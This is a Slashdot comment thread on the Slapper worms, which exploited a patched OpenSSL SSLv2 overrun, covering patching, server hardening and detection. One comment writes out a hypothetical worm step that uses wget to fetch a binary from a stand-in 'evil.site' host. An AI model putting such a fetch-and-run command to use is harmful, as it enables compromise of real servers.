Posted by
CmdrTaco
on from the random-dune-reference-here dept.
randomErr writes "The worms, Slapper.B and
Slapper.C, which exploits a known buffer overrun vulnerability in the Secure Sockets Layer 2.0 (SSLv2) handshake process has infected thousands of Web servers worldwide, according to Helsinki-based F-Secure Corp., a computer and network security company. "
1. That most system admins out there are bright enough to keep their machines up to date with the latest patches.
2. Whoever is writing these worms knows how much damage they're doing to open source. It would have been preferrable to inform the OpenSSL people first, wait a month, then release the worm.
Of course, by the time you read this, the bug will have been patched.;)
It would have been preferrable to inform the OpenSSL people first, wait a month, then release the worm.
It would be preferrable to let the security at the bank to know that your about to commit armed robbery so they can stop you. Of course there is a difference between white and black hat hackers.
-- Analytic & algebraic topology of locally Euclidean meterization of infinitely differentiable Riemmanian manifold
Re:A few hopes...
by
larien
·
· Score: 5, Informative
The patches have been out for over a month, I'm pretty sure of that. I downloaded the patches as soon as Debian had the new ones online.
So, in short, it's an old bug, it's been patched, and the only ones getting hit are people who haven't patched their openssl libraries.
The bug was patched 2 months ago so I guess that is the case:>
Re:A few hopes...
by
Anonymous Coward
·
· Score: 2, Interesting
Whoever is writing these worms knows how much damage they're doing to open source.
Most likely they don't give a shit or didn't even consider it. Not everybody is politically motivated. Some people actually see computers as nothing more than a tool, and don't really care if we live in a communist "free" world or a market-driven capitalist one, as long as their computer helps them do what they want to do. It's just a hunk of silicon, steel and plastic - it has no soul, no social conscience and its configuration is no reflection on themselves.
What a revolutionary idea! Having said that remember that people writing worms are not likely to care much about the effect of their actions, whether it's denying you connectivity or canonizing Bill Gates.
> It would have been preferrable to inform > the OpenSSL people first, wait a month, > then release the worm.
Dear OpenSSL,
We are about to release an "internet worm" which will wreak havoc on the worldwide "internet" if you don't pay a ransom of... (place little finger on lower lip)...ONE BILLION DOLLARS!
Kind regards,
Dr Evil
Seriously though, I think I'm correct in saying that slapper exploits a flaw in OpenSSL patched well before the first slapper outbreak.
Pfff.. it would also be better if people informed microsoft of _every_ exploit before releasing virii in the wild:)
I know of many examples, but it's minutes before I leave for work and I cannot cite them. But I'm hoping that you (and many others) are aware that many hackers who have found exploits in Microsoft products do inform Microsoft of the problem before releasing the exploit. Microsoft turn around and ignore them and do nothing until the hacker releases the exploit out into the open. With Microsoft, you don't get anything patched unless it makes a bad PR spin.
One such example of this was the Win32 message system allowing code to elevate its privs by sending commands to higher-priv'ed processes. It was posted to/. a few weeks ago.
Problem is, it's a similar scenario to how Windows admins get burnt - it's just that there's usually a shorter interval between patch-exploit in the Windows admin world.
Any admin of either platform who uses best practices should be safe from most exploits. Shutdown unused services (and block the ports at your firewall if feasible), keep current on security patches, stay informed, and things should be manageable.
The catch is that just like there are clueless Windows admins, there are clueless Linux admins. And the clueless admins (for either platform) make their platform as a whole look bad.
Whoever is writing these worms knows how much damage they're doing to open source. Maybe these worms come from Microsoft themselves ?
Re:A few hopes...
by
BESTouff
·
· Score: 2, Insightful
Dear OpenSSL,
We are about to release an "internet worm" which will wreak havoc on the worldwide "internet" if you don't pay a ransom of... (place little finger on lower lip)...ONE BILLION DOLLARS!
Kind regards,
Dr Evil
Don't forget to half-close your eyes
Re:A few hopes...
by
AndrewHowe
·
· Score: 3, Insightful
If Open Source claims that it is somehow better at dealing with this sort of thing, and it turns out that it isn't, then it deserves the "damage" you speak of. Why should Open Source be immune from criticism? Live by the sword, die by the sword.
Re:A few hopes...
by
pythorlh
·
· Score: 2, Insightful
The main difference that Microsoft encourages the development of clueless admins. The MCxx certifications are geared to producing admins that can pass a test, not admins who can effectively administrate. Yes, there exist lame Linux certs, too, and yes, we do have clueless Linux admins. But the whole community of Linux is based on educating the user, admin or not, about how to properly configure the system. Thus, a vastly smaller percentage of Linux admins end up clueless, and the ones that do really deserve what they get. MCxx admins often have the mistaken impression that they already know enough to do their job. Linux admins generally know what they don't know, and know who to go to to ask.
-- Do not confuse duty with what other people expect of you; they are utterly different.Duty is a debt you owe to yourself.
Yeah, the admins should have patched this up. Wanna know the funniest? Check this article where a security writer got hit with Slapper. It shows even those who should know better sometimes get hit.
> It would be preferrable to let the security at the bank to know that your about to commit armed robbery so they can stop you.
Exactly. Lots of organizations have security groups that do this sort of thing. "We're going to be testing everyone's security by staging several kinds of breakins. Our operatives will be carrying proper ID, which they will show you if you manage to apprehend them. But we won't tell you the time or place of our attack..."
There is a history of security firms doing this sort of thing, with the full knowledge of their customers' top management. There is also a history of accounting departments inserting dummy data as a test of the auditors. If the auditors don't find it, they flunk.
Any organization NOT doing this sort of test of their security is vulnerable.
-- Those who do study history are doomed to stand helplessly by while everyone else repeats it.
Re:A few hopes...
by
n9hmg
·
· Score: 3, Insightful
explain RTFM? While it incorporates profanity, and is therefore inherently rude, it isn't always meant or taken that way. There's a reason people right documentation, and it's not for finger exercise. No documentation I ever read was perfect, but most of it answers most questions I have about the application. I see the anagram used more commonly in the form of "DOH! I should have RTFM". It gets used pejoratively towards the people who are too freaking lazy to RTFM. You'd be amazed, for instance, how many people go on a newsgroup for an application, and ask questions that are addressed and answered in the first 25 displayed lines of the man page.
I answer a lot of questions on a newsgroup for a popular utility. On obvious RTFM questions, I always note the questioners name, domain, and writing style and cut them extra slack if they appear to be non-native speakers of English(technical translation is notoriously tricky). Otherwise, I simply copy/paste in the appropriate few lines of the man page, always including the headers to show where it came from, and introduced with something like "I could explain in my own words, but I think the author of the man page did a better job than I could." Here on/., people are often more terse, and when somebody says or asks something ignorant (or maybe just plain stupid), responders can get pretty rude. In your troll against Linux culture: Somebody who's too lazy or stupid or illiterate to RTFM can't be a decent unix admin, and a sharp, rude reminder of that fact makes the good ones better, and makes the bad ones go back to windows.
Re:A few hopes...
by
evilpenguin
·
· Score: 5, Insightful
And any organization doing this sort of test is STILL vulnerable. That's the problem with trying to prove a negative. Just because an intrusion failed this time does not mean that it will next time. Now, I'm not arguing against performing the kind of assessment and audit you are talking about here, but such tests are only part of the process.
I'm a bit sad that this has turned into an "open source is STILL better than Windows" thing (even though I think it is). When it comes to security, everybody in the software game has problems. The finger pointing is useless. The lessons of this attack are exactly the same as the lessons of previous attacks, whether on close or open code:
1. Software engineering needs to improve. The exploitable errors are patterns that keep on happening. As a programmer myself, I have made these mistakes. As a trade/guild/profession we need to take the time to learn these patterns and methods to avoid them. We (and I definitely include myself in this) are doing a lousy job.
2. Computer operations are doing a lousy job of keeping systems secure. This one is important, but less important than issue one, becuase system admins shouldn't have to patch systems constantly. That they have to is more a measure of the failures of software engineering than the failures of system admins. That said, until we programmers get our house in order, it does fall on admins to patch, patch, patch. This sounds simple, but it isn't. When you are talking about mission-critical systems, it is extremely dangerous to apply untested patches to production machines. So dangerous that good admins don't do it. They test patches on their test machines, and well run systems will go through applications regression testing for each set of patches. This takes time. Time during which the production systems run unpatched. Sometimes these patches come in stochastic bunches such that some patches go unapplied for months, simply because the patch came in after regression testing is too far along to start over. This leads to an ironic situation: The most critical systems to a business are often the most vulnerable. Judgement about whether a patch is for an issue is so critical that it should short-circuit regression testing is a difficult art. And what if the production systems doesn't work after the patch? Sure, you can back up; you might keep your deployments in a CVS-like archive so you can roll back in minutes, but what if even a few minutes is a few hundred thousand dollars, or a few million? How many times can you afford the risk?
One problem with many of my fellow Free Software advocates (note I said "many" and not "all") is that they have not worked in mission-critical production environments in multi-billion dollar enterprises. Many of my fellow Open Source fans have worked in environments where it is no big deal to bring the server down for ten or fifteen minutes. When those are the only kind of shops you have worked in, it is difficult to understand how serious and difficult these issues can be for some.
So don't turn this into a Windows vs. Open Source thing. We (Open Source folks) have to suck it up this time. So what? The issues are the same. Our track record is still better, but, in this situation, the past is meaningless. Where are we now? Unfortunately we are in the same place (and so is the closed world): We are still making the same mistakes in software development and asking the admins to clean up the mess. We are even blaming the admins for it, when it really is not their fault.
All of this was triggered by the previous poster's correct comments about audit and assessment. He/She's right, except that these measures are locking the stable door after the horse has bolted (except sometimes the horse hasn't yet bolted -- that's why you still do it). The problem is we software developers have made a stable door that you can walk away from with it unlocked. If we hadn't done that in the first place...
It is getting better. I'm seeing more books on programming to avoid security problems. We're learning. But there are a lot of us, and we aren't all getting the education.
You think this is tied to the popularity increas of Linux in the userbase?
Yes, just like in the case with Windows.
-- Beware: In C++, your friends can see your privates!
use chkrootkit to see if you've gotten it
by
motorsabbath
·
· Score: 5, Informative
http://www.chkrootkit.org/
version 0.37 has been updated to find the slapper - JB
-- The heat from below can burn your eyes out
Re:use chkrootkit to see if you've gotten it
by
RudeDude
·
· Score: 2, Informative
FYI The most common MD5 sig for the 0.37 tarball seems to be: b0feebea67655daa440da92099dd5187
But for some reason I also see a different MD5 for what is supposed to also be 0.37: edf50a9c8c6bf09b0a9147f2e6168826 BUT that is actually the signature from 0.35
So the bottom line is, try not to panic. Some mirrors are just a little out of sync. I am still a little nervous running this thing as root since I haven't seen anyone report that it's not a trojan itself. I guess some code review is in order.:)
-- RudeDude
Perl/Linux/PHP hacker
Re:use chkrootkit to see if you've gotten it
by
friedmud
·
· Score: 2
As a side note - you should know that if you were using Gentoo linux all you have to do is:
emerge chkrootkit
And it will get the source, check the md5, compile, and install it for you.
I'd say that this looks more like an Apache worm than a Linux worm. It does not seem too bad though, "Get your Apache systems patched and update your antivirus software and you should be fine." (from the Slapper.C article).
This shows that Linux+Apache is so widely accepted that it is a legitimate virus target. Enjoy it!
No. This is purely an openssl problem. It was patched in July! The "blame" goes with those who don't apply security patches marked as critical. The worm could as easily have been written to attack users of unpatched installations of stunnel-win32, but that wouldn't be nearly as satisfying for a worm-writer as something that can attack apache on linux.
This is the sort of thing that makes open source (and linux) look amateurish, unprofessional, and insecure.
I wonder how Windows must look then. Yikes!
-- -- Jim
Same mantra applies to Linux and MS sysadmins:
by
bittmann
·
· Score: 5, Informative
1) Don't enable services and features you don't need (or in MS sysadmin speak--DISABLE all of the services and features you don't need that have "helpfully" been activated in the base install); and
2) Keep up to date on your patch levels.
You don't have to be bleeding-edge on patches, but when a security vulnerability with malicious code in the wild has been detected, it's time to *DO* something about it!
Really, I wonder how many of these infected websites were actually USING SSL, as opposed to having that port hot but unused...
Re:Same mantra applies to Linux and MS sysadmins:
by
petard
·
· Score: 5, Informative
I would add the following:
3) Don't install a development environment (e.g. gcc, which is required for this worm to propogate) on a publically exposed web server!
Obviously, this won't work for people with only one box who want to run their personal web server off of it as well as do their dev work there, but for *real* servers this is a good practice. People who must have compilers on their web server are probably not using SSL, as you stated:-).
If you must use a compiler on your web server, FFS run the publically accessible service in a chroot jail!
-- .sig: file not found
Re:Same mantra applies to Linux and MS sysadmins:
by
rmadmin
·
· Score: 2
1) Don't enable services and features you don't need (or in MS sysadmin speak--DISABLE all of the services and features you don't need that have "
helpfully" been activated in the base install);
Or in Solaris sysadmin speak, or in redhat sysadmin speak. For instance, solaris tends to run NFS stuffs by default. And Redhat (probably a few other distro's too), tend to have a dozen or so unused services running.
Re:Same mantra applies to Linux and MS sysadmins:
by
mjh
·
· Score: 2
2) Keep up to date on your patch levels.
Thank you, debian, for apt. Here's how I keep up to date with patches:
apt-get update && apt-get -u upgrade
Apt is such a great idea. It's a better idea than RHN or whatever it is that mandrake is doing. Why? Because there are a ton of debian developers, each of them only having to watch a relatively small number of packages And when they keep up with patches, I do too, for almost no work.
This is the beauty of apt - it distributes patch management among a lot of people so that the load of any of them is relatively small. But then it allows all of us to leverage that work. It's distributed AND centralized all in one.
I'm not trying to start an distro war here. I'm just *SOOO* thankful for apt and debian. I'm trying to express gratitude. If it came out as flamebait, it was not intended.
-- Key to financial independence: Spend less than you earn. Save and invest the difference. Do it for a long time.
Re:Same mantra applies to Linux and MS sysadmins:
by
mrseth
·
· Score: 2
I know. I do the same thing on my RedHat boxes with this.
Re:Same mantra applies to Linux and MS sysadmins:
by
AftanGustur
·
· Score: 2
That 1) is *extremely* important. If you're running RedHat you can use "chkconfig --list" to see what network-based services are running (all services actually).
For everything you don't know what is, don't hesitade to do a "chkconfig --del [service]". It's not realy deleted, just disabled.
Also, do a "rpm -qa" and "rpm -e [package]" for everything you don't know/need. It's better to have to spend some time fixing a problem that ypu caused yourself than fixing something that was done by an intruder.
Re:Same mantra applies to Linux and MS sysadmins:
by
slamb
·
· Score: 5, Insightful
3) Don't install a development environment (e.g. gcc, which is required for this worm to propogate) on a publically exposed web server!
Obviously, this won't work for people with only one box who want to run their personal web server off of it as well as do their dev work there, but for *real* servers this is a good practice. People who must have compilers on their web server are probably not using SSL, as you stated:-).
I keep seeing this comment, and every time I think how stupid it is. The compiler is not the security flaw. Given the number of comments like this, I fully expect the next version of this worm to have a "|| wget http://evil.site/worm-`uname -s`-`uname -m`" in place, and evil.site to have statically linked binaries. Then people will be saying "You don't need wget on a production webserver!" or some stupid shit like that. And it will move on to something else. They're already running code on your computer. You're already screwed.
(Isn't the first piece of the exploit written in assembler, as is typical for buffer exploits? Then they have to have targeted your platform specifically anyway. I just don't see why the compiler stage is necessary at all. They can just transfer the larger chunk of worm executable in the same way they transferred the source code.)
The real solution is to secure your system in the first place: disable services you aren't using. Patch ones you are. Given the month between the patch and the exploit, anyone following this practice will be unaffected.
Re:Same mantra applies to Linux and MS sysadmins:
by
petard
·
· Score: 5, Insightful
It's not stupid at all. You are correct in stating that the compiler is not the security flaw. However, if the compiler were not there, this is the 4th worm in the past few months that you wouldn't have been vulnerable to. Simply because they *could* find other means of implementing the worm doesn't mean that you should make this one easy. There are 2 goals here:
Prevent compromise. This is done by disabling unnecessary services and keeping your patch levels current, among other things.
Reduce the impact of compromises that do occur. One way to do this is, much as you disable unnecessary services, only keep the software needed for your application on the box.
As "stupid" as it may seem from an ivory tower perspective, in practice it helps. It's not a first line of defense, but it helps.
-- .sig: file not found
Re:Same mantra applies to Linux and MS sysadmins:
by
HiThere
·
· Score: 2
A nicer answer is to move the compiler to another folder and make it unfindable from the system path, and then add it to the path of selected users. I suppose you could also read protect it, but if the virus has root, that wouldn't help, and if it doesn't, then the damage it could do is minimal. (Perhaps the script to add gcc to the path should need to be manually executed? Perhaps it should not be added, but need to be specified?/usr/bin/gcc/gcc...?) Any particular solution is possible for the virus to work around, but diverse solutions would really limit the possibilities for that. (Well, not installing gcc at all is difficult to work around, but it would also make installing software a bit difficult.)
--
I think we've pushed this "anyone can grow up to be president" thing too far.
Re:Same mantra applies to Linux and MS sysadmins:
by
mjh
·
· Score: 2
Yeah I've set up a RH box doing this, too. It's nice, but it's not the same. I think the problem is that there simply aren't enough people contributing to the RPM repositories. Basically it's just Red Hat. Which is pretty good, but it's not the same as debian.
Because RH has to maintain so many packages, more or less, all by themselves, the workload on each package maintainer is pretty high. And they're not able to keep up with patches as well as debian. Security patches are kept about equally. But other non-security related patches don't seem to get into the red hat repositories as quickly as they get into debian.
But that's just my $.02 after having tried apt-rpm for a month or so. That may not have been long enough to get a very good feel for it.
-- Key to financial independence: Spend less than you earn. Save and invest the difference. Do it for a long time.
Re:Same mantra applies to Linux and MS sysadmins:
by
slamb
·
· Score: 2
As "stupid" as it may seem from an ivory tower perspective, in practice it helps. It's not a first line of defense, but it helps.
I'd have to say that removing arbitrary bits of your toolchain because some worm uses them is an ivory tower idea. It makes assumptions of a perfect system (you have a staging machine that has identical library versions, etc). When those are not true, it doesn't work out well - the version you've meticulously tested elsewhere fails in a way it wouldn't if you had compiled it locally. And the time spent doing it could be better spent running rhn_register or similar for much more real gain.
To give further examples, I expect people to say several of the following in the future:
don't have a compiler on your production machine (again. worm workaround: download compiled code)
don't have wget on your production machine. (worm workaround: use curl, links, lynx, ftp, ncftp, scp, sftp, or just implement the transfer itself; it doesn't require much code.)
add a fake/etc/hosts entry for evil.site (work by IP address, change the site name)
deny outbound connections from the webserver (this one actually would stop your machine from infecting other servers unless the attacker gets privileges necessary to change the firewall rules, but it would be really annoying)
remove/bin/uname (use/usr/bin/file to find the binary type of a standard system binary)
remove/usr/bin/file (some other trick to find system type; there are plenty)
run the webserver in a jail on a machine that is uncrippled. (Now this one actually makes sense, though it may not realistically be worth the effort.)
At some point, you've made things much more difficult for yourself and lost all perspective on a non-problem. These worms have all happened well after the patches are available.
I find it terribly amusing how for years the open-source community has used the larger number of holes found in Windows systems as one of their arguments against it. Yet now when the open-source community is also plagued with the same thing the comments tend to be along the line of 'Windows still sux.' and 'Do you know how much you're hurting the open-source movement? Please stop.'
Seems to me like older anti-MS comments are coming around and biting people in the ass.
Yes, two or three minor worms in an optional component of an open source server are certainly as big a deal as the literally thousands of virii/security holes/etc in the fundamental core of Windows. The several thousand servers that have been infected with Slapper.b/c certainly compare in scope to the hundreds of thousands, if not millions, affected by Code Red/Nimda/I Love You/etc.
Re:The Worm
by
chrysrobyn
·
· Score: 5, Insightful
I find it terribly amusing how for years the open-source community has used the larger number of holes found in Windows systems as one of their arguments against it. Yet now when the open-source community is also plagued with the same thing the comments tend to be along the line of 'Windows still sux.' and 'Do you know how much you're hurting the open-source movement? Please stop.'
I am the administrator for two Linux servers, a Slackware 7.0 box and a Debian Woody box. I'm scared that I'll get rooted again, but do you know what I'm thinking anyway? "Bring it on." Let these worms propagate, let some publicity get out, and let the patches come. They will come, just as they always have. I'll be a wget %1;upgradepkg %1 or apt-get update;apt-get upgrade away from being back up to speed.
The open-source community, contrary to your assertion, has for years said two things 1) Lazy admins risk getting hacked and 2) Open source patches flow more freely than closed source ones. I don't think the number of holes against NT 4.0 (for example) is criticised, but rather the length of time between exploit and patch-- the criticism is of the number of documented, unpatched holes. If you show me a list of documented, unpatched holes, I'll show you a mailing list / IRC channel / news group that just found a list of things to do for the afternoon. Inexperienced teenagers (a large subset of all teenagers) and newbies are unable to refute your statement that Linux is as bad as Windows and resort to childish retorts and pleas for silence.
Bring it on, hackers, help us audit the code. Win prestige for you, win a better OS for us.
'Do you know how much you're hurting the open-source movement? Please stop.'
I don't think I've *ever* heard anyone say that - certainly not at the local LUG meetings or amongst other fellow users in the area. Maybe it's a Michigan thing, but I can not ever recall hearing or reading comments like that.
What I find terribly amusing is your lack of knowledge. Patch is more than one month old.
This virus is not hurting Linux comunity. It just shows that there's too few holes for virus writers to be original. Last 3 viruses where using the same one hole. That's more promoting than demoting.
Well, for bad admins. I fell it's ok if they get infected. And for users, they don't have web server, but if they have, they should click Update icon sometimes.
-- Signature Pro version 1.13.2-3 release 83.5 beta3try7 after-breakfast edition
I find it terribly amusing how for years the open-source community has used the larger number of holes found in Windows systems as one of their arguments against it. Yet now when the open-source community is also plagued with the same thing the comments tend to be along the line of 'Windows still sux.' and 'Do you know how much you're hurting the open-source movement? Please stop.'
Seems to me like older anti-MS comments are coming around and biting people in the ass.
Hardly. The inability to properly admin a system is biting them in the ass. The comments to Microsoft sucking when it comes to security still apply. When someone says that Linux is more secure than Windows, that is not saying it is perfect. Nobody in their right mind would say that any OS is totally secure. The difference is, it is a Linux community. People who find exploits should alert the community before releasing the information in the wild. The same applies to Windows, Microsoft should be alerted to the problem well before everyone else is. The difference is, the Open Source community will quickly patch it, Microsoft will do whatever they want to do.
There is nothing wrong with yelling at people about keeping their systems up to date. It is just bad practice to not keep up with patches. With Open Source, you can do that - with Windows, you can only do that if Microsoft provides you with patches. The OSS community has absolutely no say in how MS decides to handle vulnerabilities, but we do have a voice in our own community.
And if you think a worm or two means that now Linux is catching up to MS in the number of vulnerabilities, you are living in a dream world. Plagued? Please. At least the OSS community isn't delusional and says "there are no bugs".
--
My beliefs do not require that you agree with them.
The open-source community, contrary to your assertion, has for years said two things 1) Lazy admins risk getting hacked and 2) Open source patches flow more freely than closed source ones.
The Slashdot community, on the other hand, has for years appended a third comment: we're superior, we're Linux buffs, we're the best, and we apply patches.
Maybe the Slashdot community does. But let's face it -- in the face of this smug and elitist attitude comes the fact that thousands of Linux servers are being compromised because their administrators don't apply patches in a timely fashion. Remember, too, that when the Nimda et. al. worms hit, the Slashdot discussions included many regular readers who are also Windows administrators calmly pointing out that they had had no difficulties as they were patched long ago. Interesting, too, to note the (huge generalisation) often calm and mature reaction versus the yelling and screaming and chest-beating reaction of the "see-we-really-are-better-than-you-nyah-nyah-nyah" crowd (/huge generalisation).
If you show me a list of documented, unpatched holes, I'll show you a mailing list / IRC channel / news group that just found a list of things to do for the afternoon.
Very valid point. So let me ask you (plural you here) -- when was the last time you spent an afternoon coding, testing, reviewing, and QCing a patch? Maybe you're one of the admirable group who actually does code patches in your spare time. But, more likely, I suspect, is that the vast majority of the readers of this message never have and never will submit a patch.
Inexperienced teenagers (a large subset of all teenagers) and newbies are unable to refute your statement that Linux is as bad as Windows
I'm sorry, but I couldn't let this one go. The original poster didn't make such a statement. Not even such an inference. The post, instead, merely pointed out the hypocrisy demonstrated by the attitudes described.
Also, come the 2.6 kernel, and pluggable security modules, installing stack protectors and tiered security models will be more commonplace and a lot of the stupid holes that have allowed these attacks will simply go away.
One thing that would fix a whole lot of problems is for a security model to be installed that allowed root to delegate low-port and raw-protocol access to non-root accounts.
Granted these particular worms would not have cared, but there have been many remote root exploits that happened only because a daemon needed to be root to create a low port or perform raw protocol manipulation.
Open any folder window. Tools menu, folder options, view tab, the last option in the advanced box ("Simple file sharing") - uncheck that. You'll get your real sharing and permissions tabs back.
My statement:Inexperienced teenagers (a large subset of all teenagers) and newbies are unable to refute your statement that Linux is as bad as Windows
Kiwimate:I'm sorry, but I couldn't let this one go. The original poster didn't make such a statement. Not even such an inference. The post, instead, merely pointed out the hypocrisy demonstrated by the attitudes described.
And it was correct.
If I have misinterpreted CTRamsden's original intent of the statement that, [when faced with vulnerabilities, the open-source community responded with] "Windows still sux..." [paraphrasing, hopefully not too liberally], please forgive me, and I will ask for kiwimate to accept my thanks for pointing out a misinterpretation.
I have seen too many people equate the vocal non-coding, quick to criticise Microsoft Slashdot subgroup as characteristic of the entire open source movement. I think it's very important to remember and recognize that those people are out there -- but equally important to understand that others are out there who accept criticism as constructive.
One thing that would fix a whole lot of problems is for a security model to be installed that allowed root to delegate low-port and raw-protocol access to non-root accounts.
Yeah! I've been waiting for that one for years! Connecting to the internet just *shouldn't* require access to root!
--
I think we've pushed this "anyone can grow up to be president" thing too far.
A missed chance for some bad humor
by
shren
·
· Score: 2, Redundant
According to researchers at F-Secure, the Slapper.B worm variant is able to retrieve its source code from a Web page after the worm has been removed from infected servers. The worm uses a common free software utility, wget, to retrieve its source code from an infected Web page in the home.ro domain.
Administrators of the domain, which is located in Romania, have been notified and the infected page has been deleted from the site, according to F-Secure.
They should have replaced the code for the worm with code that pops up a window that says "Patch your server, you halfwit!"
-- Maybe the state's highest function is to grind out insoluble problems. (Zelazny, Hall of Mirrors)
A spacious analogy.
by
Lethyos
·
· Score: 2, Insightful
A bank robbery is a different type of intrusion. You cannot threaten a computer to give you access. An armed bank robbery is a failure of humans, not security systems. I'm sure all the cameras and locking mechanisms on doors and vaults at a bank work just fine in an armed robbery. The humans unlock them out of self-preservation and the mechanisms do exactly what they are requested.
Exploiting a vulnerability like this is similar to walking down the ally behind the bank and finding an unlocked door that takes you straight into the vault. Some people (other politics aside such as "who would want to help such a stupid bank!?") would inform the bank, hoping to increase it's security. Typically in open source, when we find unlocked doors, we tell the maintainers as soon as possible. It's peer review.
I am not suggesting we do not release exploits though. Worms like this are a good practice run (and a great way of informing the sysadmins they need updates). *shrug*
-- Why bother.
what does it look like?
by
Anonymous Coward
·
· Score: 5, Interesting
What should I look for in my apache logs to see if Im being "hit" by it? Anyone have an example?
your friendly neighborhood AC
Re:what does it look like?
by
EkiM+in+De
·
· Score: 2, Informative
Well I'm not entirely sure but I found that in my error_log a couple of bad hits from other Apache Servers. I found the Apache Test page on these servers which I suspect is a bit of a giveaway that perhaps these are not active servers. Anyway I could be completely wrong, but since these hits were from Web servers I kind of suspect that these servers have not been patched.... God I hope that the log entries below don't indicate that I've been hit and damaged
Anyway the hits looked like this:
You'll only get that file if you're vulnerable. If you're up to date on patches, you won't see anything in/tmp (other than files that should be there).
Re:what does it look like?
by
KMitchell
·
· Score: 5, Informative
You'll get some additional stuff in your access log and potentially error log but the telltale sign that (on a patched system) someone is pinging you for the exploit is something like this in your ssl_error_log:
Yeah, in my logs that stuff is from the same IPs that there's then the buffer overflow attempt from. Unfortunately, those spurious handshakes also create a short-term DOS situation - they keep Apache awfully busy. Has anyone come up with a way to block the spurious attempts with, say, iptables, while keeping legitimate 443 service open?
-- "with their freedom lost all virtue lose" - Milton
It's a distro problem, not a linux problem
by
tshoppa
·
· Score: 5, Insightful
The problem is that many (most? all?) the big-name
distros have Apache built with mod_ssl on them. Even
though I would guess that only a tiny percent
of all web servers need SSL. (Admittedly that
tiny percent is very important, as no money
transactions should be going on without security...)
IMHO if you need SSL on a webserver, you should
be forced to go through the download + build +
cert process yourself.
Re:It's a distro problem, not a linux problem
by
Hard_Code
·
· Score: 2
"IMHO if you need SSL on a webserver, you should be forced to go through the download + build + cert process yourself."
At some point you have to unless you want to run with a phony snakeoil cert.
Re:It's a distro problem, not a linux problem
by
tialaramex
·
· Score: 2
There's nothing phony about self-certification. Since Verisign and other companies in the CA business don't actually do any useful checks or offer a reliable revocation method, you are just saving everyone involved money. If they/really/ want to be sure you're the real deal they will use out of band methods to verify the fingerprint. Yeah, right.
After all >90% of Windows users went for years without a working CA validation check in their crypto subsystem, so without manually opening and verifying the cert they couldn't tell if it was signed by a real CA anyway.
SSL is provably effective against passive snooping, and has some deterrent value against people with low motivation and minimal resources (e.g. script kiddies) but if you think buying a cheap-ass Verisign cert protects you against black hats then you're just another Voodoo security guy.
Re:It's a distro problem, not a linux problem
by
tshoppa
·
· Score: 2
Why would you not want to encrypt everything is beyond me...
I certainly use it for passwords and anything
with any possible financial impact. But I
don't see the purpose of doing it for much else.
Maybe it's just a habit I picked up from reading
all those crypto books in grade school, but it's
well known that the greater the number of
intercepts, the easier it'll be for someone to
crack a code. Not that I believe those numbers
are anything but zero for 128-bit encryption:-)
How to test yourself
by
pbur
·
· Score: 5, Informative
If you were like me and wondered if after the OpenSSL upgrade that you actually patched everything right, you can compile and run this program to find out:
http://cert.uni-stuttgart.de/advisories/openssl- ss lv2-master/openssl-sslv2-master.c
It will connect to your HTTPS server and check it. Unfortunatly, it won't connect to SSH. It helped me make sure I was patched up at least for apache.
And I have never quite understood why the advisory says to recompile your apps as well. If they are using the Shared Library, where the problem actually exists, then they get the upgrade by default. Now, if you had some static compiles, then sure.
Ok,/. put an extra space in the URL after "openssl-ss". I will make a link URL:
The Link
Re:How to test yourself
by
jooniqzb1tch
·
· Score: 3, Informative
be sure to check your sendmail as well if you're using TLS,possibly stunnel and any other ssl enabled server you run.. (well it does not check ssh). I had patched apache immediately but this tool made me realise I had forgotten about sendmail:)
Usualy it takes at least half of hour to release patch when hole is discovered.
This time patch was month or so too fast for Slapper.B and C. Does this mean that Open Source gets better and better?
p.s. I hate lame unintuitive virus writers without imagination
-- Signature Pro version 1.13.2-3 release 83.5 beta3try7 after-breakfast edition
We're not really catching up
by
Anonymous Coward
·
· Score: 5, Insightful
Code Red infected at least 400,000 Microsoft systems. I think it infected 40,000 in the first day. Nimda got something like 65,000 plus. Slapper has infected 7,000 to 11,000, depending upon who you listen to. Now take into consideration that Linux Apache systems host a significantly larger number of web sites than Windows systems do.
Slapper is a minor event. I see a constant stream of Microsoft security alerts go through my mailbox, and you don't hear a peep out of these Microsoft apologists and cheerleaders until a serious Open Source vulnerability occurs once or twice a year.
All complex software will have bugs. It seems to me that Open Source bugs get fixed quicker, and Open Source admins are more inclined to patch in a timely manner than Microsoft ones by at least one order of magnitude. What do you expect from Windows, though, when its target market is people who don't know how to use computers.
Re:We're not really catching up
by
catfood
·
· Score: 5, Insightful
More importantly, Open Source problems stay visible until they are fixed. There's no hiding behind STO, no stonewalling.
Have you noticed how many pre-emptive security patches are made by Open Source developers? Where the announcements start with "someone pointed out this security flaw, and they were right, and we wanted to fix it before the exploits get created"? The "someone pointed out" part is a big deal. You can't get that with closed source vendorware, not proactively. As a result, security problems are frequently fixed long before they cause any problems at all.
Re:We're not really catching up
by
rindeee
·
· Score: 2, Informative
10% of what market you genius? The sector that matters here is machines with direct connection to the Internet. In that sector, Linux outnumbers Windows boxes by a strong (about 3.5 to 1 according to latest Netcraft stats giving Linux/Apache around 60% market share). Me thinks an "Introduction to Elementary Statistics" is in order my friend.
Re:We're not really catching up
by
micromoog
·
· Score: 2
Upon reading this outrageously unlikely claim, I did a bit of looking. I assume you're getting your numbers from here.
Apache, unsuprisingly, has a large market share, but no mention of OS . . . you're not assuming all of these Apache servers are running on Linux boxes, are you?
Re:We're not really catching up
by
sehryan
·
· Score: 2
And you know what? A patch was available to MS systems before Code Red starting really moving. I was pushing my administrator to do it. He didn't feel it was necessary. A couple of days later we get hit, and he spends the next days and nights trying to stop the spread and recover.
Code Red exists because of crap MS security. Code Red spread because of crap Administrators.
-- The world moves for love. It kneels before it in awe.
Re:We're not really catching up
by
Dalcius
·
· Score: 2
While the parent of your message was not correct (I don't think?), 27% of all servers today ship with Linux. And that doesn't include those that are being converted from Unix / Windows that were already owned.
10%? *bzzt* Try again.
-- ~Dalcius Rome wasn't burnt in a day.
Re:We're not really catching up
by
micromoog
·
· Score: 2
Show me any legitimate resource that says something remotely close to "60% of all Internet-connected computers run Linux". That was your outrageous claim.
Re:We're not really catching up
by
catfood
·
· Score: 2
Point taken.
But it was the openness of the source that made it possible for someone to do that forcing. It doesn't matter that 99.99% of users didn't notice the bug and didn't go through the source code to find it. What matters is that one hacker did and was able to isolate it because of the availability of source code.
Questions:
by
Black+Parrot
·
· Score: 2, Interesting
> I find it terribly amusing how for years the open-source community has used the larger number of holes found in Windows systems as one of their arguments against it. Yet now when the open-source community is also plagued with the same thing the comments tend to be along the line of 'Windows still sux.'...
How many Apache exploits per IIS exploit?
What are the average turnaround times for security updates for Apache and IIS?
How much other stuff gets broken by an Apache update and a IIS update?
